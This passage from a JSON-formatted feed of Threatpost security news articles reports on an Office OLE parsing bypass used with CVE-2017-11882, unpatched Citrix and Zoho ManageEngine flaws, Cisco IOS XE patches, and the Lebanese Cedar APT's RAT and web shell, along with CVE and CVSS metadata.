exploits in weaponized Word documents in a way that won\u2019t trigger most antivirus solutions, the researchers said. In a recent spam campaign observed by Mimecast, attached Word attachments contained a hidden exploit for an older vulnerability in Microsoft Equation Editor (CVE-2017-11882). On unpatched systems, the exploit unfolded to drop a new variant of Java JACKSBOT, a remote access backdoor that infects its target only if Java is installed.\n\nJACKSBOT is capable of taking complete control of the compromised system. It has full-service espionage capabilities, including the ability to collect keystrokes; steal cached passwords and grab data from web forms; take screenshots; take pictures and record video from a webcam; record sound from the microphone; transfer files; collect general system and user information; steal keys for cryptocurrency wallets; manage SMS for Android devices; and steal VPN certificates.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe thing that stands out for me is that the attackers behind this were keen on using the Equation exploit, probably because they found it more reliable than others, and they then worked out on a bypass to allow this go through undetected,\u201d Meni Farjon, chief scientist for advanced threat detection at Mimecast, told Threatpost. \u201cThis process of chaining these two, a code-execution exploit and a flaw which leads to a bypass is somewhat unique and we don\u2019t see many of these in data-format exploits.\u201d\n\n## The Flaw in Depth\n\nAn Object Linking and Embedding (OLE) Compound File essentially acts as an underlying file system for information and objects present in a Microsoft Word document. It contains streams of data that are treated like individual files embedded within the OLE file itself. Each stream has a name (for example, the top-level stream of a document is straightforwardly named \u201cWordDocument). Streams can also contain information on macros in the document and the metadata of a document (i.e., title, author, creation date, etc.).\n\nMimecast said that according to the format specifications for the Compound File Binary File Format, the OLE stream header contains a table called DIFAT, which is made up of an array of numbers that includes section IDs and some special numbers \u2013 it\u2019s here that the problem resides.\n\n\u201cTo access the sector N in the table, it\u2019s offset computed using the following formula: sector size * (sector ID + 1), when sector ID is DIFAT[N],\u201d the researchers explained in findings. \u201cIt seems that when a big sector ID exists, [this formula] leads to an integer-overflow that results in a relatively small offset. Because the result is more than 32 bits (integer overflow), only the lowest 32 bits will be the product when the code above performs the calculation. In other words, the calculated offset will be 0x200 = 512.\u201d\n\nThe system sees an impossible offset, according to the researchers; this can lead it to crash or, at the very least, ignore the section, including any exploit that may be hiding there.\n\n\u201cThis behavior is not documented by Microsoft, but it can confuse high-level parsers, which will not notice the overflow,\u201d Mimecast said.\n\n## In the Wild\n\nMimecast researchers said that they\u2019ve seen several attacks in the last few months that chain together the CVE-2017-11882 exploit with the OLE flaw, which has been successful, they said, in amplifying the attack to make it go undetected.\n\n\u201cOur systems were able to spot an attacker group, which seems to originate from Serbia, using specially crafted Microsoft Word documents\u2026in a way which caused the attacks to circumvent many security solutions designed to protect data from infestation,\u201d Mimecast said. The firm didn\u2019t specify which security solutions they\u2019re referring to.\n\n\u201c[With] this chaining of the older exploit with this integer overflow, Microsoft Office Word mishandles this error. It ignores the higher bytes of the OLE sector ID, loading the malicious object ([CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)) into memory while not following the correct guidelines,\u201d the researchers said.\n\nFarjon told Threatpost that although the newly found issue is being used in the wild, \u201cexploiting this is not an easy task, as it requires deep format understanding.\u201d It\u2019s the difficulty in execution that is likely behind Microsoft\u2019s decision to not immediately patch the problem, he said.\n\n## Microsoft Response\n\nDespite evidence that the flaw is being actively exploited to great effect in the wild, the Microsoft Security Response Center told Mimecast that it will not be fixing OLE with a security patch anytime soon, because the issue by itself does not result in memory corruption and thus doesn\u2019t meet the security bar for an immediate fix.\n\n\u201cWhat Microsoft said is that they won\u2019t be fixing it right now, but perhaps they will on a later undefined date,\u201d Farjon told Threatpost.\n\nHe added, \u201cThey said it is an unintended behavior, but at the same time that it is not important enough to fix right now. Realistically, Microsoft needs to prioritize their work on patches, so their decision makes sense. That being said, it\u2019s up to security professionals to make sure their systems are as up to date as possible and that they are leveraging the threat intelligence they need to better manage today\u2019s evolving threats.\u201d\n\nThe researcher also offered a bottom-line assessment: \u201cAnalyzing all possible outcomes of such flaw is a tough task,\u201d he said. \u201cMimecast worked with the Microsoft Security Response Center and they did analyze all possible outcomes, and came to the conclusion that it didn\u2019t result in memory corruption. So, while it may not be severe, having another tool for attackers to bypass security solutions is not a good thing.\u201d\n\nThreatpost reached out to the computing giant for comments on the findings, and received a short statement: _\u201c_The bug submitted did not meet the severity bar for servicing via a security update,\u201d said a Microsoft spokesperson.\n\n**_Follow all of Threatpost\u2019s RSA Conference 2019 coverage by visiting our [special coverage section](<https://threatpost.com/microsite/rsa-conference-2019-show-coverage/>)._**\n", "cvss3": {}, "published": "2019-03-05T11:00:03", "type": "threatpost", "title": "RSAC 2019: Microsoft Zero-Day Allows Exploits to Sneak Past Sandboxes", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2019-19781"], "modified": "2019-03-05T11:00:03", "id": "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "href": "https://threatpost.com/zero-day-exploit-microsoft/142327/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:31:10", "description": "About one in five of the 80,000 companies affected by a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway are still at risk from a trivial attack on their internal operations.\n\nIf exploited, the flaw could allow unauthenticated attackers to gain remote access to a company\u2019s local network and carry out arbitrary code-execution. Researchers told Threatpost that other attacks are also possible, including denial-of-service (DoS) campaigns, data theft, lateral infiltration to other parts of the corporate infrastructure, and phishing.\n\nAccording to an assessment from Positive Technologies, which disclosed the software vulnerability in December (tracked as [CVE-2019-19781](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>)), 19 percent of vulnerable organizations in 158 countries have yet to patch. The U.S. originally accounted for 38 percent of all vulnerable organizations; about 21 percent of those are still running vulnerable instances of the products as of this week, PT said.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe Citrix products (formerly the NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively.\n\n\u201cPatching this bug should be an urgent priority for all remaining companies affected,\u201d said Mikhail Klyuchnikov, an expert at PT who discovered the flaw, speaking to Threatpost. \u201cThe critical vulnerability allows attackers to obtain direct access to the company\u2019s local network from the internet. This attack does not require access to any accounts, and therefore can be performed by any external attacker.\u201d\n\nHe added, \u201cThe flaw is really easy to exploit. It\u2019s also very reliable.\u201d[![](https://media.threatpost.com/wp-content/uploads/sites/103/2020/02/07094404/PT_Citrix_NewMap-EN-1024x529.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/02/07094404/PT_Citrix_NewMap-EN.jpg>)\n\nSince Citrix is mainly used for giving remote access to applications in companies\u2019 internal networks, Klyuchnikov told Threatpost that a compromise could easily used as a foothold to move laterally across a victim organization.\n\n\u201cThe critical information about applications accessible by Citrix can be leaked,\u201d he explained. \u201cThat could possibly include information (and possibly credentials) about internal web applications, corporate applications, remote desktops and other applications available through the Citrix Gateway.\u201d\n\nAttackers also could gain the ability to read configuration files, he said; these contain sensitive information like user credentials, yet more information about the internal network and credentials for internal services (LDAP, RADIUS and so on).\n\n\u201cDepending on system settings, attackers can get administrative credentials for the Citrix Gateway, credentials (login, password, etc.) of company employees and credentials of other services used in Citrix Gateway [from the configuration files],\u201d he said.\n\nAdding insult to injury, various other kinds of attacks are possible as well.\n\n\u201c[An attacker] can conduct DoS attacks against Citrix Gateway, just deleting its critical files,\u201d the researcher explained to Threatpost. \u201cIt can lead to unavailability of the login page of Citrix application. Thus, no one (e.g. company employees) can get access into internal network using Citrix gateway. In other words, the Citrix gateway application will cease to do its main task for which it was installed.\u201d\n\nIt\u2019s also possible to conduct phishing attacks. For example, a hacker can change the login page so that the entered username and password is obtained by the attacker as clear text.\n\nAnd then there\u2019s the remote code-execution danger: \u201cAn attacker can use a compromised application as part of a botnet or for cryptocurrency mining. And of course, it can place malicious files in this application,\u201d Klyuchnikov noted.\n\nIn-the-wild attacks could be imminent: On January 8, a researcher [released an exploit](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) that allows a potential attacker to perform automated attacks. Others followed.\n\nhttps://twitter.com/GossiTheDog/status/1214892555306971138\n\nCitrix did not disclose many details about the vulnerability [in its security advisory](<https://support.citrix.com/article/CTX267027>), however, Qualys researchers last month said that the mitigation steps offered by the vendor suggest the flaw stems from the VPN handler failing to sufficiently sanitize user-supplied inputs.\n\nAccording to PT, the countries with the greatest numbers of vulnerable companies are led by Brazil (43 percent of all companies where the vulnerability was originally detected), China (39 percent), Russia (35 percent), France (34 percent), Italy (33 percent) and Spain (25 percent). The USA, Great Britain, and Australia each stand at 21 percent of companies still using vulnerable devices without any protection measures.\n\nLast month, Citrix [issued patches](<https://support.citrix.com/article/CTX267027>) for several product versions to fix the issue, [ahead of schedule](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>).\n\n\u201cConsidering how long this vulnerability has been around (since the first vulnerable version of the software was released in 2014), detecting potential exploitation of this vulnerability (and, therefore, infrastructure compromise) retrospectively becomes just as important [as patching],\u201d Klyuchnikov said.\n\nHe added, \u201cI think it\u2019s easy to apply the patch, as there is already a regular update for the hardware that fixes the vulnerability. Nothing should get in the way, as there is a full update from Citrix.\u201d\n\n**Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us **[**Wednesday, Feb. 19 at 2 p.m. ET**](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>)** when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives.**\n", "cvss3": {}, "published": "2020-02-07T15:32:52", "type": "threatpost", "title": "Critical Citrix RCE Flaw Still Threatens 1,000s of Corporate LANs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-5135"], "modified": "2020-02-07T15:32:52", "id": "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "href": "https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:27:50", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. Steven Seeley of Source Incite, [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter, Thursday, along with a proof of concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of the Desktop Central. The FileStorage class is used to store data for reading data to or from a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost, attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. Nate Warfield, a security researcher with Microsoft, pointed to[ at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. Also previously a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-09T15:34:54", "description": "A critical security vulnerability in the Zoho ManageEngine ADSelfService Plus platform could allow remote attackers to bypass authentication and have free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nThe issue (CVE-2021-40539) has been actively exploited in the wild as a zero-day, according to the Cybersecurity and Infrastructure Security Agency (CISA).\n\nZoho issued a patch on Tuesday, and CISA [warned that](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) admins should not only apply it immediately, but also ensure in general that ADSelfService Plus is not directly accessible from the internet. The issue affects builds 6113 and below (the fixed version is 6114).\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) solution for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application which can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\n\u201cUltimately, this underscores the threat posed to internet-facing applications,\u201d Matt Dahl, principal intelligence analyst for Crowdstrike, [noted](<https://twitter.com/voodoodahl1/status/1435673342925737991>). \u201cThese don\u2019t always get the same attention as exploit docs with decoy content, but the variety of these web-facing services gives actors lots of options.\u201d\n\nThis isn\u2019t Zoho\u2019s first zero-day rodeo. In March 2020, [researchers disclosed](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) a zero-day vulnerability in Zoho\u2019s ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones and more from a central location. The critical bug ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>), with a CVSS score of 9.8) allowed an unauthenticated, remote attacker to gain complete control over affected systems \u2013 \u201cbasically the worst it gets,\u201d researchers said at the time.\n\n## **Authentication Bypass and RCE**\n\nThe issue at hand is an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus, which could lead to remote code execution (RCE), according to Zoho\u2019s [knowledge-base advisory](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>).\n\n\u201cThis vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request,\u201d according to the firm. \u201cThis would allow the attacker to carry out subsequent attacks resulting in RCE.\u201d\n\nEchoing CISA\u2019s assessment, Zoho also noted that \u201cWe are noticing indications of this vulnerability being exploited.\u201d The firm characterized the issue as \u201ccritical\u201d although a CVSS vulnerability-severity rating has not yet been calculated for the bug.\n\nFurther technical details are for now scant (and no public exploit code appears to be making the rounds \u2014 yet), but Dahl noted that the zero-day attacks have been going on for quite some time:\n\n> Observed exploitation of this vuln _before_ CVE-2021-26084 (Atlassian Confluence) which got a lot of attention last week. Some very general observations:\n> \n> 1/ <https://t.co/rIfxxeBlmO>\n> \n> \u2014 Matt Dahl (@voodoodahl1) [September 8, 2021](<https://twitter.com/voodoodahl1/status/1435673338693754886?ref_src=twsrc%5Etfw>)\n\nHowever, he said that the attacks have thus far been highly targeted and limited, and possibly the work of a single (unknown, for now) actor.\n\n\u201cActor(s) appeared to have a clear objective with ability to get in and get out quickly,\u201d he tweeted.\n\nHe also noted similarities to the attacks taking place on Atlassian Confluence instances (CVE-2021-26084), which also started out as limited and targeted. However, in that case, researchers were able to \u201crapidly produce\u201d a PoC exploit, he pointed out, and eventually there was proliferation to multiple targeted-intrusion actors, usually resulting in cryptomining activity ([as seen in](<https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/>) the recent Jenkins attack).\n\nAtlassian Confluence, like AD SelfService Plus, allows centralized cloud access to a raft of sensitive corporate information, being a collaboration platform where business teams can organize their work in one place.\n\n## How to Know if Zoho AD SelfService Plus is Vulnerable\n\nUsers can tell if they\u2019ve been affected by taking a gander at the \\ManageEngine\\ADSelfService Plus\\logs folder to see if the following strings are found in the access log entries:\n\n * /RestAPI/LogonCustomization\n * /RestAPI/Connection\n\nZoho also said that users will find the following files in the ADSelfService Plus installation folder if running a vulnerable version:\n\n * cer in \\ManageEngine\\ADSelfService Plus\\bin folder.\n * jsp in \\ManageEngine\\ADSelfService Plus\\help\\admin-guide\\Reports folder.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T12:58:48", "type": "threatpost", "title": "Zoho ManageEngine Password Manager Zero-Day Gets Fix", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189", "CVE-2021-26084", "CVE-2021-40539"], "modified": "2021-09-09T12:58:48", "id": "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "href": "https://threatpost.com/zoho-password-manager-zero-day-attack/169303/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-08T12:01:01", "description": "UDPATE\n\nCisco Systems issued [24 patches Wednesday](<https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir#~Vulnerabilities>) tied to vulnerabilities in its IOS XE operating system and warned customers that two small business routers (RV320 and RV325) are vulnerable to attack and that no patches are available for either. A total of 19 of the bugs were rated high severity by Cisco, with the others rated medium.\n\nThe two router vulnerabilities are rated high and are part of Cisco\u2019s Dual Gigabit WAN VPN RV320 and RV325 line of small business routers. Both router flaws were first patched in January, however Cisco said on Wednesday that both patches were \u201cincomplete\u201d and that both routers were still vulnerable to attack. It added in both cases that, \u201cfirmware updates that address [these vulnerabilities] are not currently available.\u201d It added there are no workarounds that address either vulnerability.\n\nOne of the router flaws ([CVE-2019-1652](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>)) is a command injection vulnerability \u201cdue to improper validation of user-supplied input,\u201d Cisco wrote. The bug could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands.\n\nThe second router bug ([CVE-2019-1653](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>)) is an information disclosure vulnerability also impacting Cisco Small Business RV320 and RV325 routers. \u201cA vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information,\u201d Cisco wrote.\n\n**IOS XE Bugs**\n\nOf the high severity vulnerabilities 15 were tied to Cisco\u2019s Internetworking Operating System (IOS) XE, which runs on Cisco networking gear such as its switches, controllers and routers. Bugs ranged from privilege escalation, injection and denial of service vulnerabilities.\n\nOne bug ([CVE-2019-1745](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190327-xecmd>)) is a Cisco IOS XE software command injection vulnerability. According to Cisco, the vulnerability could be exploited by a local adversary that could inject arbitrary commands into the OS that are executed with elevated privileges.\n\n\u201cThe vulnerability is due to insufficient input validation of commands supplied by the user. An attacker could exploit this vulnerability by authenticating to a device and submitting crafted input to the affected commands. An exploit could allow the attacker to gain root privileges on the affected device,\u201d wrote Cisco.\n\nThe two command injection patches ([CVE-2019-1756](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190327-iosxe-cmdinject>), [CVE-2019-1755](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190327-iosxe-cmdinject>)) allow a remote authenticated attacker to execute commands on devices running the vulnerable Cisco IOS XE software.\n\n\u201cThe vulnerability occurs because the affected software improperly sanitizes user-supplied input. An attacker who has valid administrator access to an affected device could exploit this vulnerability by supplying a username with a malicious payload in the web UI and subsequently making a request to a specific endpoint in the web UI,\u201d Cisco said of CVE-2019-1756.\n\n**Four Critical Non-Cisco Bugs Also Reported **\n\nAs part of its flurry of patch announcements, Cisco also posted information regarding four vulnerabilities rated critical for non-Cisco products. The critical bugs include:\n\nMoodle mybackpack functionality server side request forgery vulnerability ([CVE-2019-3809](<https://tools.cisco.com/security/center/viewAlert.x?alertId=59842>)) that could allow an unauthenticated, remote attacker to conduct a server side request forgery attack on a targeted system.\n\nA second critical vulnerability was found in Elastic Kibana Security Audit Logger that could lead to an arbitrary code execution ([CVE-2019-7610](<https://tools.cisco.com/security/center/viewAlert.x?alertId=59833>)).\n\nCisco also reported a Python urllib security bypass vulnerability ([CVE-2019-9948](<https://tools.cisco.com/security/center/viewAlert.x?alertId=59825>)) and a Elastic Kibana Timelion Visualizer arbitrary code execution vulnerability ([CVE-2019-7609](<https://tools.cisco.com/security/center/viewAlert.x?alertId=59832>)).\n\n_(This article was updated at 11pm EDT 3/27 to reflect more accurately a lack of patches available for the Cisco RV320 and RV325 routers)_\n", "cvss3": {}, "published": "2019-03-27T21:48:15", "type": "threatpost", "title": "Cisco Releases Flood of Patches for IOS XE, But Leaves Some Routers Open to Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-1745", "CVE-2019-1755", "CVE-2019-1756", "CVE-2019-3809", "CVE-2019-7609", "CVE-2019-7610", "CVE-2019-9948"], "modified": "2019-03-27T21:48:15", "id": "THREATPOST:0B3F568CF532B4D11A2D561F09E1490F", "href": "https://threatpost.com/cisco-releases-flood-of-patches-for-ios-xe-and-small-business-routers/143228/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-02T02:58:26", "description": "Advanced persistent threat (APT) group Lebanese Cedar has compromised at least 250 public-facing servers since early 2020, researchers said, with its latest malware.\n\nThe group has added new features to its custom \u201cCaterpillar\u201d webshell and the \u201cExplosive RAT\u201d remote access trojan (RAT), both of which researchers at ClearSky Security said they linked to the [compromise of the public servers [PDF]](<https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf>), which allowed widespread espionage.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe target companies are from many countries including: The United States, the United Kingdom, Egypt, Jordan, Lebanon, Israel and the Palestinian Authority,\u201d according to researchers. \u201cWe assess that there are many more companies that have been hacked and that valuable information was stolen from these companies over periods of months and years.\u201d\n\n## An Upgrade for Explosive RAT\n\nLebanese Cedar\u2019s hallmark is trolling for vulnerable systems. The latest, fourth version of Explosive RAT has been used against unpatched Oracle (CVE-2012-3152) and Atlassian servers (CVE-2019-3396 and CVE-2019-11581) web servers, ClearSky said. The group is also the only [APT group](<https://threatpost.com/apt-groups-success-mix-tools/160927/>) known to use the Explosive RAT code, ClearSky added.\n\nClearSky said it identified specific upgrades made to the new Explosive RAT versus the previous version, which was first used back in 2015 \u2014 namely anti-debugging and encrypted communications between the compromised machine to the command-and-control (C2) server.\n\n\u201cExplosive utilizes multiple evasion techniques to avoid detection and maintain persistence, such as obfuscation, communication encryption and using a separate DLL for API activity,\u201d ClearSky\u2019s report said. \u201cSince 2015, the tool had been minorly changed in obfuscation and communication encryption. The RAT\u2019s control network is well thought out. It consists of default hard-coded C2 servers, static update servers and DGA-based dynamic update servers.\u201d\n\nThe new Explosive RAT has additional new spy weapons to use against systems too, like keylogging, screenshot capture and command execution, according to ClearSky, making the threat both stubborn and illicit.\n\n\u201cThe malware\u2019s data-collection capabilities are both passive and active \u2013 it harvests data found on the compromised machine and features the ability to search for data on-demand,\u201d according to ClearSky. \u201cExplosive also features functionalities such as machine fingerprinting, memory-usage monitoring to assure stealth, remote shell and arbitrary code-execution.\u201d\n\n## **Web Shell Updates**\n\nLebanese Cedar\u2019s most recent malware toolkit also uses a second version of the Caterpillar web shell, for the widespread collection of network data and the installation of files on targeted systems.\n\n\u201cActing as a focal point, the group usually attacks web servers via a custom web 